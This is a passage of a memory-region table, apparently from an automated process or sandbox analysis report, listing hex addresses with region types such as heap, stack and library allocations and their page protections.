|
trusted library allocation
|
page read and write
|
||
2F9000
|
heap
|
page read and write
|
||
5C43000
|
heap
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
1A800000
|
heap
|
page execute and read and write
|
||
2159000
|
heap
|
page read and write
|
||
370D000
|
heap
|
page read and write
|
||
26BE000
|
stack
|
page read and write
|
||
5945000
|
trusted library allocation
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
2341000
|
trusted library allocation
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
4E0C000
|
heap
|
page read and write
|
||
1CDB000
|
direct allocation
|
page read and write
|
||
36F4000
|
heap
|
page read and write
|
||
4CF1000
|
heap
|
page read and write
|
||
2552000
|
trusted library allocation
|
page read and write
|
||
1CC0000
|
heap
|
page read and write
|
||
3B39000
|
heap
|
page read and write
|
||
356000
|
heap
|
page read and write
|
||
429000
|
heap
|
page read and write
|
||
3EA0000
|
trusted library allocation
|
page read and write
|
||
1B16E000
|
stack
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
55BC000
|
heap
|
page read and write
|
||
3B21000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
1CC7000
|
direct allocation
|
page read and write
|
||
3B72000
|
heap
|
page read and write
|
||
3B91000
|
heap
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
36AD000
|
stack
|
page read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
4E3000
|
heap
|
page read and write
|
||
3B74000
|
heap
|
page read and write
|
||
1E80000
|
direct allocation
|
page read and write
|
||
1C015000
|
heap
|
page read and write
|
||
4D50000
|
heap
|
page read and write
|
||
3260000
|
remote allocation
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
4C1000
|
heap
|
page read and write
|
||
290B000
|
heap
|
page read and write
|
||
5334000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
5D53000
|
heap
|
page read and write
|
||
32EE000
|
trusted library allocation
|
page read and write
|
||
13E000
|
heap
|
page read and write
|
||
370D000
|
heap
|
page read and write
|
||
51D5000
|
heap
|
page read and write
|
||
204F000
|
stack
|
page read and write
|
||
46D000
|
heap
|
page read and write
|
||
3B4B000
|
heap
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
546000
|
heap
|
page read and write
|
||
1DF0000
|
heap
|
page execute and read and write
|
||
1B40000
|
trusted library allocation
|
page read and write
|
||
32F5000
|
trusted library allocation
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
58A0000
|
trusted library allocation
|
page read and write
|
||
50D6000
|
heap
|
page read and write
|
||
208F000
|
stack
|
page read and write
|
||
1DA5000
|
heap
|
page read and write
|
||
50BE000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
3B8D000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
2120000
|
heap
|
page read and write
|
||
4E0C000
|
heap
|
page read and write
|
||
7FFFFF84000
|
trusted library allocation
|
page readonly
|
||
3193000
|
trusted library allocation
|
page read and write
|
||
4E3000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
515C000
|
heap
|
page read and write
|
||
3AA000
|
heap
|
page read and write
|
||
5DEC000
|
heap
|
page read and write
|
||
2FC000
|
heap
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
37B0000
|
trusted library allocation
|
page read and write
|
||
259E000
|
stack
|
page read and write
|
||
4BB000
|
heap
|
page read and write
|
||
40C000
|
heap
|
page read and write
|
||
51BD000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
51D6000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
51D5000
|
heap
|
page read and write
|
||
649000
|
heap
|
page read and write
|
||
288000
|
heap
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
3298000
|
trusted library allocation
|
page read and write
|
||
22C000
|
stack
|
page read and write
|
||
411000
|
heap
|
page read and write
|
||
36A5000
|
heap
|
page read and write
|
||
2555000
|
trusted library allocation
|
page read and write
|
||
546000
|
heap
|
page read and write
|
||
371C000
|
heap
|
page read and write
|
||
1FE0000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
56C0000
|
trusted library allocation
|
page read and write
|
||
3B3000
|
heap
|
page read and write
|
||
32F000
|
heap
|
page read and write
|
||
1DBF000
|
stack
|
page read and write
|
||
3846000
|
heap
|
page read and write
|
||
517B000
|
heap
|
page read and write
|
||
260C000
|
trusted library allocation
|
page read and write
|
||
31A0000
|
trusted library allocation
|
page read and write
|
||
569A000
|
heap
|
page read and write
|
||
3B4E000
|
heap
|
page read and write
|
||
1AF8E000
|
stack
|
page read and write
|
||
3A7000
|
heap
|
page read and write
|
||
4D9C000
|
heap
|
page read and write
|
||
11F51000
|
trusted library allocation
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
2A40000
|
heap
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
3280000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
5870000
|
trusted library allocation
|
page read and write
|
||
46D000
|
heap
|
page read and write
|
||
562E000
|
heap
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
38B000
|
stack
|
page read and write
|
||
55C2000
|
heap
|
page read and write
|
||
1C4FC000
|
stack
|
page read and write
|
||
46D000
|
heap
|
page read and write
|
||
266C000
|
trusted library allocation
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
239E000
|
trusted library allocation
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
11F30000
|
trusted library allocation
|
page read and write
|
||
12D000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
1EC0000
|
heap
|
page read and write
|
||
4C1000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
1ACFE000
|
heap
|
page read and write
|
||
5526000
|
heap
|
page read and write
|
||
164000
|
heap
|
page read and write
|
||
3286000
|
trusted library allocation
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
3199000
|
trusted library allocation
|
page read and write
|
||
3B8F000
|
heap
|
page read and write
|
||
22A000
|
heap
|
page read and write
|
||
4ECE000
|
heap
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
3B72000
|
heap
|
page read and write
|
||
55BA000
|
heap
|
page read and write
|
||
4C8000
|
heap
|
page read and write
|
||
55C7000
|
heap
|
page read and write
|
||
1FB000
|
heap
|
page read and write
|
||
3B72000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
45F000
|
heap
|
page read and write
|
||
3B7000
|
heap
|
page read and write
|
||
5956000
|
trusted library allocation
|
page read and write
|
||
251E000
|
stack
|
page read and write
|
||
319B000
|
trusted library allocation
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
3DE000
|
heap
|
page read and write
|
||
57A0000
|
trusted library allocation
|
page read and write
|
||
51C2000
|
heap
|
page read and write
|
||
5CF4000
|
heap
|
page read and write
|
||
5CC5000
|
heap
|
page read and write
|
||
3420000
|
trusted library allocation
|
page read and write
|
||
325C000
|
stack
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
4BC000
|
heap
|
page read and write
|
||
565C000
|
heap
|
page read and write
|
||
3273000
|
trusted library allocation
|
page read and write
|
||
1A0000
|
heap
|
page read and write
|
||
4E0E000
|
heap
|
page read and write
|
||
3B8D000
|
heap
|
page read and write
|
||
3AC000
|
heap
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
53B000
|
heap
|
page read and write
|
||
429000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
1C2CF000
|
stack
|
page read and write
|
||
2F3000
|
heap
|
page read and write
|
||
442000
|
heap
|
page read and write
|
||
5849000
|
trusted library allocation
|
page read and write
|
||
3B95000
|
heap
|
page read and write
|
||
36B6000
|
heap
|
page read and write
|
||
4BB000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
468000
|
heap
|
page read and write
|
||
5D5E000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
2B1000
|
stack
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
36C5000
|
heap
|
page read and write
|
||
51C2000
|
heap
|
page read and write
|
||
361000
|
heap
|
page read and write
|
||
404000
|
heap
|
page read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
2542000
|
trusted library allocation
|
page read and write
|
||
3ED000
|
heap
|
page read and write
|
||
3B3A000
|
heap
|
page read and write
|
||
40B000
|
heap
|
page read and write
|
||
5562000
|
heap
|
page read and write
|
||
1CC3000
|
direct allocation
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
5041000
|
heap
|
page read and write
|
||
21F000
|
heap
|
page read and write
|
||
7FE89A98000
|
trusted library allocation
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
532B000
|
heap
|
page read and write
|
||
5CE8000
|
heap
|
page read and write
|
||
32E8000
|
trusted library allocation
|
page read and write
|
||
569A000
|
heap
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
49FB000
|
stack
|
page read and write
|
||
4D92000
|
heap
|
page read and write
|
||
25A4000
|
trusted library allocation
|
page read and write
|
||
55B7000
|
heap
|
page read and write
|
||
274C000
|
trusted library allocation
|
page read and write
|
||
438F000
|
stack
|
page read and write
|
||
3A7000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
2123000
|
heap
|
page read and write
|
||
7FE89AB8000
|
trusted library allocation
|
page read and write
|
||
1DA5000
|
heap
|
page read and write
|
||
55C7000
|
heap
|
page read and write
|
||
4D8A000
|
heap
|
page read and write
|
||
528000
|
heap
|
page read and write
|
||
53B6000
|
heap
|
page read and write
|
||
319B000
|
trusted library allocation
|
page read and write
|
||
546000
|
heap
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
31A2000
|
trusted library allocation
|
page read and write
|
||
2A9000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
2EB000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
3B8A000
|
heap
|
page read and write
|
||
1C90000
|
direct allocation
|
page read and write
|
||
5C20000
|
heap
|
page read and write
|
||
3F8000
|
heap
|
page read and write
|
||
370D000
|
heap
|
page read and write
|
||
5E56000
|
heap
|
page read and write
|
||
5D2F000
|
heap
|
page read and write
|
||
2121000
|
trusted library allocation
|
page read and write
|
||
4D90000
|
heap
|
page read and write
|
||
1BB0000
|
heap
|
page read and write
|
||
1E9000
|
heap
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
3B88000
|
heap
|
page read and write
|
||
3B6E000
|
heap
|
page read and write
|
||
3282000
|
trusted library allocation
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
5334000
|
heap
|
page read and write
|
||
5C5B000
|
heap
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
4D93000
|
heap
|
page read and write
|
||
2E1B000
|
stack
|
page read and write
|
||
4E05000
|
heap
|
page read and write
|
||
36C5000
|
heap
|
page read and write
|
||
3B4C000
|
heap
|
page read and write
|
||
1A090000
|
heap
|
page read and write
|
||
7FE89892000
|
trusted library allocation
|
page read and write
|
||
1C87E000
|
stack
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
216A000
|
heap
|
page read and write
|
||
36A1000
|
heap
|
page read and write
|
||
1C21E000
|
stack
|
page read and write
|
||
A0000
|
heap
|
page read and write
|
||
160000
|
heap
|
page read and write
|
||
514000
|
heap
|
page read and write
|
||
294000
|
heap
|
page read and write
|
||
4E11000
|
heap
|
page read and write
|
||
3DE000
|
heap
|
page read and write
|
||
393000
|
heap
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
50CC000
|
heap
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
2FC000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
1C232000
|
heap
|
page read and write
|
||
3B4E000
|
heap
|
page read and write
|
||
1B0000
|
trusted library allocation
|
page read and write
|
||
4D92000
|
heap
|
page read and write
|
||
7FE89AB4000
|
trusted library allocation
|
page read and write
|
||
32AA000
|
trusted library allocation
|
page read and write
|
||
4D9C000
|
heap
|
page read and write
|
||
50C9000
|
heap
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
36DD000
|
heap
|
page read and write
|
||
5240000
|
heap
|
page read and write
|
||
3BC0000
|
trusted library allocation
|
page read and write
|
||
1A83E000
|
heap
|
page execute and read and write
|
||
363000
|
heap
|
page read and write
|
||
3987000
|
heap
|
page read and write
|
||
200E000
|
heap
|
page read and write
|
||
5672000
|
heap
|
page read and write
|
||
1ACE2000
|
heap
|
page read and write
|
||
2CB000
|
heap
|
page read and write
|
||
36A6000
|
heap
|
page read and write
|
||
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
3985000
|
heap
|
page read and write
|
||
533D000
|
heap
|
page read and write
|
||
5D47000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
51DB000
|
heap
|
page read and write
|
||
5CD1000
|
heap
|
page read and write
|
||
515C000
|
heap
|
page read and write
|
||
39A000
|
heap
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
8B56000
|
trusted library allocation
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
1C6B0000
|
heap
|
page read and write
|
||
50BE000
|
heap
|
page read and write
|
||
41B000
|
heap
|
page read and write
|
||
5526000
|
heap
|
page read and write
|
||
27B4000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
5E3F000
|
heap
|
page read and write
|
||
2351000
|
trusted library allocation
|
page read and write
|
||
3983000
|
heap
|
page read and write
|
||
1CEB000
|
direct allocation
|
page read and write
|
||
1DDB000
|
heap
|
page read and write
|
||
3440000
|
direct allocation
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
4E05000
|
heap
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
330000
|
heap
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
371F000
|
heap
|
page read and write
|
||
5860000
|
trusted library allocation
|
page read and write
|
||
140000
|
trusted library allocation
|
page read and write
|
||
5E04000
|
heap
|
page read and write
|
||
2E0000
|
trusted library allocation
|
page read and write
|
||
3A3D000
|
heap
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
2091000
|
trusted library allocation
|
page read and write
|
||
1D80000
|
heap
|
page read and write
|
||
7FE89A52000
|
trusted library allocation
|
page read and write
|
||
1CEF000
|
direct allocation
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
3282000
|
trusted library allocation
|
page read and write
|
||
1C8AF000
|
stack
|
page read and write
|
||
38C000
|
heap
|
page read and write
|
||
1A6000
|
stack
|
page read and write
|
||
46B000
|
heap
|
page read and write
|
||
191000
|
stack
|
page read and write
|
||
7FE89A6C000
|
trusted library allocation
|
page read and write
|
||
37A000
|
heap
|
page read and write
|
||
7FE89A74000
|
trusted library allocation
|
page read and write
|
||
5663000
|
heap
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
32F0000
|
trusted library allocation
|
page read and write
|
||
5950000
|
trusted library allocation
|
page read and write
|
||
1C220000
|
heap
|
page read and write
|
||
3B7B000
|
heap
|
page read and write
|
||
1EB3000
|
direct allocation
|
page read and write
|
||
2713000
|
trusted library allocation
|
page read and write
|
||
55F1000
|
heap
|
page read and write
|
||
197000
|
stack
|
page read and write
|
||
4E05000
|
heap
|
page read and write
|
||
32FD000
|
trusted library allocation
|
page read and write
|
||
1F80000
|
direct allocation
|
page read and write
|
||
32FA000
|
trusted library allocation
|
page read and write
|
||
5940000
|
trusted library allocation
|
page read and write
|
||
429000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
3A9F000
|
stack
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
3703000
|
heap
|
page read and write
|
||
17E000
|
heap
|
page read and write
|
||
3B88000
|
heap
|
page read and write
|
||
100000
|
heap
|
page read and write
|
||
5241000
|
heap
|
page read and write
|
||
1F6F000
|
trusted library allocation
|
page read and write
|
||
1BE6000
|
heap
|
page read and write
|
||
3639000
|
heap
|
page read and write
|
||
3282000
|
trusted library allocation
|
page read and write
|
||
1C25F000
|
heap
|
page read and write
|
||
51C2000
|
heap
|
page read and write
|
||
327E000
|
trusted library allocation
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
52EA000
|
heap
|
page read and write
|
||
532B000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
3AE000
|
heap
|
page read and write
|
||
5D99000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
5334000
|
heap
|
page read and write
|
||
1AD9E000
|
heap
|
page read and write
|
||
7FFFFF89000
|
trusted library allocation
|
page execute read
|
||
3A53000
|
heap
|
page read and write
|
||
3A43000
|
heap
|
page read and write
|
||
551E000
|
heap
|
page read and write
|
||
1B1EE000
|
stack
|
page read and write
|
||
10A000
|
heap
|
page read and write
|
||
4F3000
|
heap
|
page read and write
|
||
5D9000
|
heap
|
page read and write
|
||
498000
|
heap
|
page read and write
|
||
4F8000
|
heap
|
page read and write
|
||
3633000
|
heap
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
20C0000
|
heap
|
page read and write
|
||
426000
|
heap
|
page read and write
|
||
569C000
|
heap
|
page read and write
|
||
2F0000
|
heap
|
page read and write
|
||
1C20000
|
heap
|
page read and write
|
||
2613000
|
trusted library allocation
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
39F000
|
heap
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
412000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
55BC000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
429000
|
heap
|
page read and write
|
||
3080000
|
remote allocation
|
page read and write
|
||
284000
|
heap
|
page read and write
|
||
38B9000
|
heap
|
page read and write
|
||
55C1000
|
heap
|
page read and write
|
||
7FE89BB7000
|
trusted library allocation
|
page read and write
|
||
31A2000
|
trusted library allocation
|
page read and write
|
||
26F000
|
heap
|
page read and write
|
||
4E0C000
|
heap
|
page read and write
|
||
1CE0000
|
heap
|
page read and write
|
||
3B73000
|
heap
|
page read and write
|
||
3B68000
|
heap
|
page read and write
|
||
1E00000
|
direct allocation
|
page read and write
|
||
120C1000
|
trusted library allocation
|
page read and write
|
||
1B0EE000
|
stack
|
page read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
3A2000
|
heap
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
4D92000
|
heap
|
page read and write
|
||
3C8000
|
stack
|
page read and write
|
||
3C6000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
305000
|
heap
|
page read and write
|
||
361000
|
heap
|
page read and write
|
||
5E27000
|
heap
|
page read and write
|
||
5870000
|
trusted library allocation
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
1B10000
|
trusted library allocation
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
4E05000
|
heap
|
page read and write
|
||
417000
|
heap
|
page read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
3703000
|
heap
|
page read and write
|
||
3B7F000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
3B8F000
|
heap
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
7FE89A50000
|
trusted library allocation
|
page execute and read and write
|
||
371B000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
3B8D000
|
heap
|
page read and write
|
||
2230000
|
heap
|
page execute and read and write
|
||
41A000
|
heap
|
page read and write
|
||
7FE89946000
|
trusted library allocation
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
51D5000
|
heap
|
page read and write
|
||
1CF0000
|
heap
|
page read and write
|
||
3B7F000
|
heap
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
55C5000
|
heap
|
page read and write
|
||
4C8000
|
heap
|
page read and write
|
||
1C6000
|
heap
|
page read and write
|
||
3B72000
|
heap
|
page read and write
|
||
5336000
|
heap
|
page read and write
|
||
5526000
|
heap
|
page read and write
|
||
5E1B000
|
heap
|
page read and write
|
||
333000
|
heap
|
page read and write
|
||
36A0000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
3AD9000
|
heap
|
page read and write
|
||
32AD000
|
trusted library allocation
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
1EE0000
|
direct allocation
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
1C24B000
|
heap
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
6B7000
|
heap
|
page read and write
|
||
3A0000
|
heap
|
page read and write
|
||
220A000
|
heap
|
page read and write
|
||
515A000
|
heap
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
404000
|
heap
|
page read and write
|
||
4D6000
|
heap
|
page read and write
|
||
468000
|
heap
|
page read and write
|
||
36D6000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
7FFFFF85000
|
trusted library allocation
|
page execute read
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
3B6000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
53B6000
|
heap
|
page read and write
|
||
3275000
|
trusted library allocation
|
page read and write
|
||
247F000
|
stack
|
page read and write
|
||
1EA7000
|
direct allocation
|
page read and write
|
||
3B00000
|
trusted library allocation
|
page read and write
|
||
51C3000
|
heap
|
page read and write
|
||
5412000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
1AFA6000
|
heap
|
page read and write
|
||
6770000
|
trusted library allocation
|
page read and write
|
||
517C000
|
heap
|
page read and write
|
||
4E0E000
|
heap
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
319F000
|
trusted library allocation
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
1A808000
|
heap
|
page execute and read and write
|
||
3703000
|
heap
|
page read and write
|
||
7FE899D0000
|
trusted library allocation
|
page execute and read and write
|
||
3199000
|
trusted library allocation
|
page read and write
|
||
1EB3000
|
direct allocation
|
page read and write
|
||
2707000
|
trusted library allocation
|
page read and write
|
||
344000
|
heap
|
page read and write
|
||
1AE000
|
heap
|
page read and write
|
||
3B4D000
|
heap
|
page read and write
|
||
4C8000
|
heap
|
page read and write
|
||
4FB000
|
heap
|
page read and write
|
||
2722000
|
trusted library allocation
|
page read and write
|
||
1CE0000
|
direct allocation
|
page read and write
|
||
4D6000
|
heap
|
page read and write
|
||
51A000
|
heap
|
page read and write
|
||
3B3A000
|
heap
|
page read and write
|
||
1C40F000
|
stack
|
page read and write
|
||
53BC000
|
heap
|
page read and write
|
||
26B000
|
stack
|
page read and write
|
||
5849000
|
trusted library allocation
|
page read and write
|
||
32AB000
|
trusted library allocation
|
page read and write
|
||
371F000
|
heap
|
page read and write
|
||
1AB38000
|
stack
|
page read and write
|
||
53B4000
|
heap
|
page read and write
|
||
35B000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
2C0000
|
heap
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
7FE898B4000
|
trusted library allocation
|
page read and write
|
||
4DA000
|
heap
|
page read and write
|
||
464000
|
heap
|
page read and write
|
||
32A6000
|
trusted library allocation
|
page read and write
|
||
3A1000
|
heap
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
3703000
|
heap
|
page read and write
|
||
1C91C000
|
stack
|
page read and write
|
||
4C70000
|
heap
|
page read and write
|
||
4AE000
|
heap
|
page read and write
|
||
32E000
|
heap
|
page read and write
|
||
32F4000
|
trusted library allocation
|
page read and write
|
||
237000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
2BE000
|
heap
|
page read and write
|
||
2A9000
|
heap
|
page read and write
|
||
32FB000
|
trusted library allocation
|
page read and write
|
||
3447000
|
direct allocation
|
page read and write
|
||
3B7F000
|
heap
|
page read and write
|
||
36B4000
|
heap
|
page read and write
|
||
5D82000
|
heap
|
page read and write
|
||
140000
|
heap
|
page read and write
|
||
397D000
|
heap
|
page read and write
|
||
4240000
|
trusted library allocation
|
page read and write
|
||
3275000
|
trusted library allocation
|
page read and write
|
||
3460000
|
heap
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
1B17B000
|
heap
|
page read and write
|
||
3DAF000
|
stack
|
page read and write
|
||
519000
|
heap
|
page read and write
|
||
5849000
|
trusted library allocation
|
page read and write
|
||
130000
|
heap
|
page read and write
|
||
885000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
3960000
|
trusted library allocation
|
page read and write
|
||
364000
|
heap
|
page read and write
|
||
46D000
|
heap
|
page read and write
|
||
4D92000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
55FF000
|
heap
|
page read and write
|
||
3770000
|
trusted library allocation
|
page read and write
|
||
50D6000
|
heap
|
page read and write
|
||
363000
|
heap
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
36F7000
|
heap
|
page read and write
|
||
2960000
|
heap
|
page read and write
|
||
19F90000
|
heap
|
page read and write
|
||
31A000
|
heap
|
page read and write
|
||
54E6000
|
heap
|
page read and write
|
||
230000
|
heap
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
31A2000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
1F21000
|
trusted library allocation
|
page read and write
|
||
519E000
|
heap
|
page read and write
|
||
5E4A000
|
heap
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
3638000
|
heap
|
page read and write
|
||
4D94000
|
heap
|
page read and write
|
||
405F000
|
stack
|
page read and write
|
||
50CB000
|
heap
|
page read and write
|
||
2990000
|
heap
|
page read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
56D000
|
heap
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
3195000
|
trusted library allocation
|
page read and write
|
||
4D99000
|
heap
|
page read and write
|
||
5691000
|
heap
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
5870000
|
trusted library allocation
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
55CF000
|
heap
|
page read and write
|
||
371B000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
391000
|
heap
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
251000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
565C000
|
heap
|
page read and write
|
||
36A7000
|
heap
|
page read and write
|
||
27BE000
|
stack
|
page read and write
|
||
3FF000
|
heap
|
page read and write
|
||
402F000
|
stack
|
page read and write
|
||
2CF000
|
heap
|
page read and write
|
||
5526000
|
heap
|
page read and write
|
||
21B000
|
stack
|
page read and write
|
||
515C000
|
heap
|
page read and write
|
||
5BC000
|
heap
|
page read and write
|
||
3706000
|
heap
|
page read and write
|
||
2C1000
|
heap
|
page read and write
|
||
1C92F000
|
stack
|
page read and write
|
||
1EF000
|
heap
|
page read and write
|
||
4D97000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
2110000
|
heap
|
page execute and read and write
|
||
53B6000
|
heap
|
page read and write
|
||
5875000
|
trusted library allocation
|
page read and write
|
||
50BF000
|
heap
|
page read and write
|
||
5DE0000
|
heap
|
page read and write
|
||
50CB000
|
heap
|
page read and write
|
||
329A000
|
trusted library allocation
|
page read and write
|
||
533B000
|
heap
|
page read and write
|
||
4D5A000
|
heap
|
page read and write
|
||
4EFD000
|
heap
|
page read and write
|
||
3977000
|
heap
|
page read and write
|
||
6D5000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
1B0000
|
heap
|
